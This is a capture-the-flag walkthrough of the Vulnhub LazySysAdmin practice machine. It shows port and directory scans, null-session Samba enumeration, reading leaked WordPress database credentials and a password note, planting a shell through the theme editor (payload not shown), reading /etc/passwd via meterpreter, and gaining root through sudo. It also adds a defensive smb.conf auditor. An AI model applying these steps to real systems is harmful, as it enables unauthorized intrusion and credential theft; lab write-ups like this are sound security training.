Vulnhub machine: LAZYSYSADMIN
Basic information
- Difficulty: super easy
- Name: LazySysAdmin: 1
- Date release: 20 Sep 2017
- Download (Mirror): https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip
Testing process
Exposed ports:
Nmap scan report for 192.168.146.138
Host is up, received syn-ack (0.0015s latency).
Scanned at 2023-10-12 23:18:30 EDT for 3s
Not shown: 65529 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
3306/tcp open mysql syn-ack
6667/tcp open irc syn-ack
Approach:
- Test the web service first, obviously
- Then port 445
- Finally, brute-force MySQL and SSH
Testing port 80
The site is entirely static pages, so a directory scan is needed.
Target: http://192.168.146.138/

[23:27:46] Starting:
[23:28:03] 200 -  743B - /apache/
[23:28:15] 200 -   35KB - /index.html
[23:28:16] 200 -   76KB - /info.php
[23:28:16] 301 -  322B - /javascript  ->  http://192.168.146.138/javascript/
[23:28:22] 301 -  315B - /old  ->  http://192.168.146.138/old/
[23:28:22] 200 -  737B - /old/
[23:28:24] 301 -  322B - /phpmyadmin  ->  http://192.168.146.138/phpmyadmin/
[23:28:25] 200 -    8KB - /phpmyadmin/index.php    (tested: no weak password)
[23:28:25] 200 -    8KB - /phpmyadmin/
[23:28:28] 200 -   92B - /robots.txt
[23:28:33] 301 -  316B - /test  ->  http://192.168.146.138/test/
[23:28:33] 200 -  739B - /test/
[23:28:37] 301 -  314B - /wp  ->  http://192.168.146.138/wp/
[23:28:37] 200 -    3KB - /wordpress/wp-login.php    (tested: no weak password)
[23:28:37] 200 -   12KB - /wordpress/
[23:28:38] 200 -  735B - /wp/

So set this aside for now and look at port 445, since a Samba service is running there.
Port 445
- Tool usage
Enum4linux is a tool for enumerating SMB services on Windows and Linux systems.

root@kali:~# enum4linux -h
enum4linux v0.9.1 (http://labs.portcullis.co.uk/application/enum4linux/)
Copyright (C) 2011 Mark Lowe (mrl@portcullis-security.com)

Simple wrapper around the tools in the samba package to provide similar
functionality to enum.exe (formerly from www.bindview.com). Some additional
features such as RID cycling have also been added for convenience.

Usage: ./enum4linux.pl [options] ip

Options are (like "enum"):
    -U        get userlist
    -M        get machine list*
    -S        get sharelist
    -P        get password policy information
    -G        get group and member list
    -d        be detailed, applies to -U and -S
    -u user   specify username to use (default "")
    -p pass   specify password to use (default "")
The scan shows that a null session is allowed:

Server 192.168.146.138 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.146.138 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is
Connect with smbclient

smbclient -L 192.168.146.138    # list the shared directories; see the man page for full usage
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        share$          Disk      Sumshare
        IPC$            IPC       IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP

smbclient //192.168.146.138/share$    # IPC$ is not accessible
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 15 07:05:52 2017
  ..                                  D        0  Mon Aug 14 08:34:47 2017
  wordpress                           D        0  Thu Oct 12 23:21:40 2023
  Backnode_files                      D        0  Mon Aug 14 08:08:26 2017
  wp                                  D        0  Tue Aug 15 06:51:23 2017
  deets.txt                           N      139  Mon Aug 14 08:20:05 2017
  robots.txt                          N       92  Mon Aug 14 08:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 08:39:56 2017
  apache                              D        0  Mon Aug 14 08:35:19 2017
  index.html                          N    36072  Sun Aug  6 01:02:15 2017
  info.php                            N       20  Tue Aug 15 06:55:19 2017
  test                                D        0  Mon Aug 14 08:35:10 2017
  old                                 D        0  Mon Aug 14 08:35:13 2017

smb: \> more deets.txt    # a likely password file; next read the WordPress config, since it holds the database credentials
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

smb: \wordpress\> more wp-config.php
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');
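The root cause of this foothold is a Samba share that is readable by a null session and whose path is the web root, so wp-config.php and the password note are served to anyone. As an added example (not part of the original write-up), the following Python script flags that pattern in an smb.conf; both configurations are constructed, since the box's real smb.conf is not shown, and the web root path /var/www/html is an assumption.

```python
# Added check for the misconfiguration behind this box's foothold: a Samba share
# readable without credentials whose path is the web root, leaking wp-config.php.
# Constructed smb.conf resembling the weak setup (the box's real file was not shown).
WEAK_SMB_CONF = """[global]
   map to guest = Bad User
[share$]
   path = /var/www/html
   guest ok = yes
   read only = yes
"""
# Hardened variant: no guest fallback, named users only, share outside the web root.
FIXED_SMB_CONF = """[global]
   map to guest = Never
[share$]
   path = /srv/samba/share
   guest ok = no
   valid users = togie
   read only = yes
"""

def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {key: value}}, names lowercased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def audit_smb_conf(text, web_roots=("/var/www",)):
    """Return (section, problem) pairs for guest access and web-root exposure."""
    conf = parse_smb_conf(text)
    findings = []
    if conf.get("global", {}).get("map to guest", "Never").lower() != "never":
        findings.append(("global", "map to guest: failed logins fall back to guest, so null sessions work"))
    for name, opts in conf.items():
        if name == "global":
            continue
        if opts.get("guest ok", "no").lower() in ("yes", "true", "1"):
            findings.append((name, "guest ok = yes: readable without credentials"))
        path = opts.get("path", "").rstrip("/")
        if path and any(path == r or path.startswith(r + "/") for r in web_roots):
            findings.append((name, f"path {path} is under a web root; config files such as wp-config.php are exposed"))
    return findings
```

Running audit_smb_conf on WEAK_SMB_CONF reports three findings, while the hardened variant reports none.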
Getting a shell
- After logging into the WordPress admin panel, the theme editor turns out to allow writing a shell directly
Find the path of 404.php

                3029776 blocks of size 1024. 1451776 blocks available
smb: \wordpress\wp-content\themes\twentyfifteen\> ls
  .                                   D        0  Wed Aug  2 17:02:01 2017
  ..                                  D        0  Thu Oct 12 23:21:37 2023
  content-page.php                    N     1117  Tue Dec 16 08:00:22 2014
  archive.php                         N     1914  Thu Dec 11 05:24:21 2014
  search.php                          N     1405  Tue Dec 16 08:00:22 2014
  404.php                             N     1434  Thu Oct 12 11:12:34 2023
  index.php                           N     1765  Thu Dec 11 05:24:21 2014
  content.php                         N     1702  Tue Dec 16 08:00:22 2014
  content-none.php                    N     1166  Tue Dec 16 08:00:22 2014
  content-link.php                    N     1753  Tue Dec 16 08:00:22 2014
  page.php                            N      902  Wed Nov 19 15:28:25 2014
  style.css                           N    97742  Thu Jun  8 00:43:33 2017
  genericons                          D        0  Wed Aug  2 17:02:01 2017
  readme.txt                          N     3501  Thu Jun  8 00:43:33 2017
  single.php                          N     1528  Fri Dec 12 13:37:22 2014
  sidebar.php                         N     1313  Wed Nov 19 15:28:25 2014
  js                                  D        0  Wed Aug  2 17:02:01 2017
  functions.php                       N    13857  Sat Oct 22 21:56:32 2016
  header.php                          N     1846  Wed Mar  9 18:02:28 2016
  rtl.css                             N    12458  Thu May 25 11:19:42 2017
  image.php                           N     2940  Tue Dec 16 08:00:22 2014
  footer.php                          N      823  Tue Dec 16 08:00:22 2014
  content-search.php                  N     1101  Tue Dec 16 08:00:22 2014
  css                                 D        0  Wed Aug  2 17:02:01 2017
  comments.php                        N     1473  Tue Dec 16 08:00:22 2014
  screenshot.png                      N   576231  Fri Mar 18 13:01:29 2016
  inc                                 D        0  Wed Aug  2 17:02:01 2017
  author-bio.php                      N     1141  Tue Dec 16 08:00:22 2014

                3029776 blocks of size 1024. 1451776 blocks available

No need to spell out the rest; those who know, know.
Go straight to MSF, gather basic information, and try privilege escalation

meterpreter > cat /etc/passwd    # besides root there is also this user
togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash

Try the suspected password found earlier. No privilege escalation is even needed; the account can use sudo directly:

togie@LazySysAdmin:~$ sudo -l
[sudo] password for togie:
Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
Wrap-up
- Directory scanning is needed
- enum4linux account and password enumeration
- Connecting with smbclient